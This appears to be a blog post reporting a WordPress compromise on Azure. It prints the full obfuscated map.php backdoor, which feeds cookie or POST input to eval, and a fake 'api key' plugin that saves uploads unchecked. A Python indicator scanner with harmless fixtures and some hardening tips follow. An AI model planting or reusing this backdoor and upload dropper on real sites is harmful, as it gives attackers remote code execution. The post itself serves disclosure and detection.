WordPress malware on Azure
I recently received a security alert for a WordPress web app running on Azure:
1. There was an unrecognized login as an admin user.
2. The user uploaded a .zip file to the plugins folder that contained two files: map.php and apikey.php.
3. The user ran a "test" through the "plugin".
The code of map.php (a single obfuscated line that reads values from request cookies or POST fields, decodes them and hands the result to eval):
<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}
The code of apikey.php (the fake plugin: it echoes a marker when ?test=hello is requested and saves any uploaded file under its original name, with no checks):
<?php
/**
* @package api key
*/
/*
Plugin Name: api key
*/
if ("hello"==$_GET["test"])
{
echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
echo "true";
}
[Image: the fake "api key" plugin as listed on the WordPress site]
Sucuri sent an alert that the .zip file had been uploaded to the site. At this point there is no easy way to find the affected files on a WordPress installation, even with tools like Sucuri's online scanner.
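One way to triage which files under wp-content/plugins carry the markers visible in map.php and apikey.php (string fragments glued into a function name, calls made through $GLOBALS, a pack("H*") decode feeding eval, request input reaching it, and an unchecked move_uploaded_file) is a small indicator scan. The script below is an added example, not code from the post or from Sucuri; it assumes the plugins directory is passed in as a path and runs against constructed fixtures modelled on the two files rather than the files themselves:

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the two files shown above: string fragments glued into a
# function name, calls through $GLOBALS[...][n](), a pack("H*") hex decode feeding
# eval(), request input reaching it, and move_uploaded_file() on a raw $_FILES entry.
INDICATORS = {
    "eval": (3, re.compile(r"\beval\s*\(")),
    "dynamic_call_via_globals": (3, re.compile(r"\$GLOBALS\[[^\]]+\]\[\d+\]\s*\(")),
    "unrestricted_upload": (3, re.compile(r"move_uploaded_file\s*\(\s*\$_FILES")),
    "split_string_name": (2, re.compile(r"""['"][a-z0-9_]+['"]\s*\.\s*['"][a-z0-9_]+['"]""")),
    "hex_unpack_format": (2, re.compile(r"""['"]H\*['"]""")),
    "decoder_name": (1, re.compile(r"\b(str_rot13|strrev)\b")),
    "request_input": (1, re.compile(r"\$_(COOKIE|POST|GET|REQUEST)\b")),
}
THRESHOLD = 3  # one strong indicator, or a few weak ones together, flags a file

def score_php(source):
    """Return (score, matched indicator names) for one PHP source text."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(source)]
    return sum(INDICATORS[h][0] for h in hits), hits

def scan_plugins(plugins_dir):
    """Walk a wp-content/plugins tree; return {relative path: hits} for flagged files."""
    findings = {}
    for path in sorted(Path(plugins_dir).rglob("*.php")):
        score, hits = score_php(path.read_text(errors="ignore"))
        if score >= THRESHOLD:
            findings[path.relative_to(plugins_dir).as_posix()] = hits
    return findings

# Constructed fixtures carrying the post's map.php / apikey.php patterns without being
# working backdoors (eval only runs a constant here); hello.php is a benign control.
FIXTURES = {
    "apikey/map.php": "<?php $GLOBALS['_g_']=Array('str_' .'rot13','pack');\n"
                      "$x=$GLOBALS['_g_'][1](\"H*\",$_COOKIE['k'] ?? '');\n@eval('return 1;');",
    "apikey/apikey.php": "<?php /* Plugin Name: api key */\nif ('hello'==$_GET['test']) echo 'ok';\n"
                         "if(is_uploaded_file($_FILES['f']['tmp_name']))\n"
                         "  move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);",
    "hello-dolly/hello.php": "<?php /* Plugin Name: Hello Dolly */\nfunction greet() { return $_GET['q'] ?? ''; }",
}

def demo():
    """Write the fixtures into a temporary plugins directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in FIXTURES.items():
            (Path(tmp) / rel).parent.mkdir(parents=True, exist_ok=True)
            (Path(tmp) / rel).write_text(body)
        return scan_plugins(Path(tmp))
```

Note that the split-name and $GLOBALS indicators are what catch map.php: the decoder names str_rot13 and strrev never appear contiguously in it, so a plain grep for those function names misses it.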
Recommendations:
- Enable the Sucuri plugin on your WordPress site
- Enable WAF v2 in front of your web app
- If possible, isolate the resource in an App Service Environment
- Harden the NSG(s)
- Run an SSL test against your web app
If you have any other tips or recommendations, please share!